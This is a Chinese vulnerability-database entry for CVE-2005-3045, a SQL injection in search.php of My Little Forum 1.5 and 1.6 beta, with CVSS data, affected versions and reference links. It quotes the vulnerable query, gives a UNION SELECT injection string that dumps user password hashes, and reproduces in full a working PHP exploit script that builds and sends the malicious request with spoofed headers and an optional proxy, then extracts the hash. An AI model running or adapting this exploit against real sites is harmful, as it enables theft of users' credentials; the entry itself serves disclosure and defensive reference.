CVE-2005-3045
CVSS7.5
发布时间 :2005-09-23 20:03:00
修订时间 :2016-10-17 23:32:28
NMCOES    

[原文]SQL injection vulnerability in search.php in My Little Forum 1.5 and 1.6 beta allows remote attackers to execute arbitrary SQL commands via the phrase field.


[CNNVD]My Little Forum search.php远程SQL注入漏洞(CNNVD-200509-235)

        My Little Forum是一款简单的WEB论坛程序。
        My Little Forum中存在SQL注入漏洞,成功利用这个漏洞的攻击者可以完全入侵基础数据库系统。
        在search.php的第144行:
        ...
         $result = mysql_query("SELECT id, pid, tid, DATE_FORMAT(time + INTERVAL ".
         $time_difference." HOUR,'".$lang['time_format']."') AS Uhrzeit,
         DATE_FORMAT(time + INTERVAL ".$time_difference." HOUR, '".$lang['time_format']."')
         AS Datum, subject, name, email, hp, place, text, category FROM ".$forum_table."
         WHERE ".$search_string." ORDER BY tid DESC, time ASC LIMIT ".$ul.", "
         .$settings['search_results_per_page'], $connid);
        ...
        然后在搜索页面,选择"phrase",然后键入:
        [whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,
        user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where
        user_name='[username]' /*
        由于没有过滤$searchstring变量,如果关闭了magic quote的话,就可以得到任何管理员/用户口令哈希。
        1.6beta版也受漏洞影响:
        ...
        $result = mysql_query("SELECT id, pid, tid, UNIX_TIMESTAMP(time + INTERVAL \
        ".$time_difference." HOUR) AS Uhrzeit, subject, name, email, hp, place, text, \
        category FROM ".$db_settings['forum_table']." WHERE ".$search_string." ORDER BY tid \
        DESC, time ASC LIMIT ".$ul.", ".$settings['search_results_per_page'], $connid);
        ...
        在注入字符串中删除语句,可得到同样的结果
        [whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,
        user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where
        user_name='[username]' /*

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:my_little_homepage:my_little_forum:1.5
cpe:/a:my_little_homepage:my_little_forum:1.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3045
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3045
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-235
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=112741430006983&w=2
(UNKNOWN)  BUGTRAQ  20050922 My Little Forum 1.5 / 1.6beta SQL Injection
http://rgod.altervista.org/mylittle15_16b.html
(VENDOR_ADVISORY)  MISC  http://rgod.altervista.org/mylittle15_16b.html
http://www.securityfocus.com/bid/14908
(UNKNOWN)  BID  14908

- 漏洞信息

My Little Forum search.php远程SQL注入漏洞
高危 SQL注入
2005-09-23 00:00:00 2005-10-20 00:00:00
远程  
        My Little Forum是一款简单的WEB论坛程序。
        My Little Forum中存在SQL注入漏洞,成功利用这个漏洞的攻击者可以完全入侵基础数据库系统。
        在search.php的第144行:
        ...
         $result = mysql_query("SELECT id, pid, tid, DATE_FORMAT(time + INTERVAL ".
         $time_difference." HOUR,'".$lang['time_format']."') AS Uhrzeit,
         DATE_FORMAT(time + INTERVAL ".$time_difference." HOUR, '".$lang['time_format']."')
         AS Datum, subject, name, email, hp, place, text, category FROM ".$forum_table."
         WHERE ".$search_string." ORDER BY tid DESC, time ASC LIMIT ".$ul.", "
         .$settings['search_results_per_page'], $connid);
        ...
        然后在搜索页面,选择"phrase",然后键入:
        [whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,
        user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where
        user_name='[username]' /*
        由于没有过滤$searchstring变量,如果关闭了magic quote的话,就可以得到任何管理员/用户口令哈希。
        1.6beta版也受漏洞影响:
        ...
        $result = mysql_query("SELECT id, pid, tid, UNIX_TIMESTAMP(time + INTERVAL \
        ".$time_difference." HOUR) AS Uhrzeit, subject, name, email, hp, place, text, \
        category FROM ".$db_settings['forum_table']." WHERE ".$search_string." ORDER BY tid \
        DESC, time ASC LIMIT ".$ul.", ".$settings['search_results_per_page'], $connid);
        ...
        在注入字符串中删除语句,可得到同样的结果
        [whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,
        user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where
        user_name='[username]' /*

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.mylittlehomepage.net/forum_script.html

- 漏洞信息 (1225)

My Little Forum <= 1.5 (searchstring) SQL Injection Exploit (EDBID:1225)
php webapps
2005-09-22 Verified
0 rgod
N/A [点击下载]
<?php
#   mlfexpl.php                                                                #
#                                                                              #
#   My Little Forum 1.5 ( possibly prior versions) SQL Injection /             #
#   MD5 password hash disclosure poc exploit with proxy support                #
#                                                                              #
#                                by rgod                                       #
#                      site: http://rgod.altervista.org                        #
#                                                                              #
#   make these changes in php.ini if you have troubles                         #
#   to launch this script:                                                     #
#   allow_call_time_pass_reference = on                                        #
#   register_globals = on                                                      #
#                                                                              #
#   usage: launch this script from Apache, fill requested fields, then...      #
#   dump all password hashes from database right now...                        #
#                                                                              #
#   Sun-Tzu: "You can be sure of succeeding in your attacks if you only attack #
#   places which are undefended. You can ensure the safety of your defense if  #
#   you only hold positions that cannot be attacked."                          #

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'<head><title>My Little Forum 1.5 SQL Injection </title><meta http-equiv="Co
ntent-Type"  content="text/html; charset=iso-8859-1"><style type="text/css"><!--
body,td,th {   color:  #00FF00;} body {  background-color: #000000;} .Stile5   {
font-family: Verdana, Arial, Helvetica,  sans-serif; font-size: 10px;}  .Stile6{
font-family: Verdana, Arial, Helvetica, sans-serif; font-weight:  bold; font-sty
le: italic; } --> </style></head> <body> <p class="Stile6">  My   Little Forum 1
.5 SQL Injection </p><p class="Stile6">a script by rgod at <a href="http: //rgod
.altervista.org"    target="_blank" > http://rgod.altervista.org </a> </p><table
width="84%"><tr><td width="43%">  <form  name="form1"  method="post"   action="'
.$SERVER[PHP_SELF].'?path=value&host=value&port=value&proxy=value&username=value
"><p><input type="text" name="host"><span class="Stile5">hostname (ex: www.siten
ame.com) </span></p><p><input type="text"    name="path">  <span class="Stile5">
path (ex: /mylf/ or just /) </span></p><p><input type="text"  name="port" ><span
class="Stile5"> specify a port other than 80 (default value)</span></p><p><input
type="text" name="proxy"> <span class="Stile5"> send  exploit  through  an  HTTP
proxy (ip:port) </span> </p> <p> <input type="text" name="username"> <span class
="Stile5">username whom you want MD5 hash </span> </p> <p> <input  type="submit"
name="Submit" value="go!"></p></form></td></tr></table></body>';

function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
             $ji=0;
             $ci++;
             echo "<td>&nbsp;&nbsp;</td>";
             for ($li=0; $li<=15; $li++)
                      { echo "<td>".$headeri[$li+$ki]."</td>";
			    }
            $ki=$ki+16;
            echo "</tr><tr>";
            }
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
                      { echo "<td>&nbsp&nbsp</td>";
                       }

for ($li=$ci*16; $li<=strlen($headeri); $li++)
                      { echo "<td>".$headeri[$li]."</td>";
			    }
echo "</tr></table>";
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacket($packet,$show)
{
global $proxy, $host, $port, $html;
if ($proxy=='')
           {$ock=fsockopen(gethostbyname($host),$port);}
             else
           {
	    if (!eregi($proxy_regex,$proxy))
	    {echo htmlentities($proxy).' -> not a valid proxy...';
	     die;
	    }
	   $parts=explode(':',$proxy);
	    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
	    $ock=fsockopen($parts[0],$parts[1]);
	    if (!$ock) { echo 'No response from proxy...';
			die;
		       }
	   }
fputs($ock,$packet);
if ($proxy=='')
  {

    $html='';
    while (!feof($ock))
      {
        $html.=fgets($ock);
      }
  }
else
  {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
    {
      $html.=fread($ock,1);
    }
  }
fclose($ock);
if ($show) {echo nl2br(htmlentities($html));}
}

if (($path<>'') and ($host<>'') and ($username<>''))
{
  if ($port=='') {$port=80;}


$sql="%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw";
$sql=", user_pw"; //if version is 1.6 beta, just add a comment to ths line
$sql=" FROM forum_userdata WHERE user_name='".$username."'/*";
$sql=urlencode($sql);

if ($proxy=='')
{$packet="GET ".$path."search.php?search=".$sql."&ao=phrase HTTP/1.1\r\n";}
else
{$packet="GET http://".$host.$path."search.php?search=".$sql."&ao=phrase HTTP/1.1\r\n";}
$packet.="Client-IP: 127.0.0.1\r\n";
$packet.="X-Forwarded-For: 127.0.0.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
$packet.="Referer: http://".$host.$path."search.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Baiduspider+(+http://www.baidu.com/search/spider.htm)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Keep-Alive\r\n\r\n";
show($packet);
sendpacket($packet,0);
$temp=explode(';<span class="category">(',$html);
$temp2=explode(')</span>',$temp[1]);
$hash=$temp2[0];

echo '<br>username: '.$username.' hash: '.$hash;
# debugging...
//echo htmlentities($html);
}
else
{
echo '<br>fill in all requested fields, optionally specify a proxy...<br>';
}
?>

# milw0rm.com [2005-09-22]
		

- 漏洞信息

19650
my little forum search.php search Field SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

My Little Forum contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the search.php script not properly sanitizing user-supplied input to the 'search' parameter. This may allow an attacker to inject or manipulate SQL queries in the back-end database.

- 时间线

2005-09-22 Unknow
2005-09-22 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

My Little Forum Search.PHP SQL Injection Vulnerability
Input Validation Error 14908
Yes No
2005-09-22 12:00:00 2007-02-20 04:06:00
rgod is credited with the discovery of this vulnerability.

- 受影响的程序版本

my little homepage my little forum 1.5
my little homepage my little forum 1.3

- 漏洞讨论

The 'my little forum' application is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

- 漏洞利用

No exploit is required.

The following proof of concept has been provided:

- 解决方案

Please see the references for more information.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站